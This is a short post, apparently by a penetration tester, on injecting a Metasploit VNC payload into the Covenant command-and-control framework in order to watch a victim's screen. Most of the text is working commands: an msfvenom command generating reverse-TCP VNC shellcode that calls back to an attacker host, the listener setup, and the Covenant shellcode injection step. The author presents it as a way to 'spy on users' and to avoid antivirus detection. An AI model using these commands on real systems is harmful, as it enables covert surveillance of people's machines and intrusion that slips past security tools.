# Injecting VNC into Covenant

Cobalt Strike has this neat feature where you can start a TightVNC server and spy on users. You can do this with Meterpreter (https://www.hackingarticles.in/capture-vnc-session-remote-pc-using-msfvenom/), but Meterpreter payloads tend to get flagged by AV. A fun thing I discovered is that you can also inject this same shellcode into Covenant to do this.

```
msfvenom -p windows/x64/vncinject/reverse_tcp LHOST=10.10.14.X LPORT=443 -f hex
```

Set up a listener:

```
use multi/handler
set LHOST 10.10.14.X
set LPORT 443
set payload windows/x64/vncinject/reverse_tcp
exploit
```

Copy and paste the hex string into Covenant:

```
shellcode HEXSTRINGHERE
```

Sadly, even the DLL built into Cobalt Strike is starting to get flagged by AV.

https://github.com/rsmudge/vncdll

https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/payloads/stages/windows/x64/vncinject.rb

https://github.com/rapid7/metasploit-framework/tree/76954957c740525cff2db5a60bcf936b4ee06c42/external/source/vncdll/winvnc

I'm gonna have to leave obfuscating that for a different day.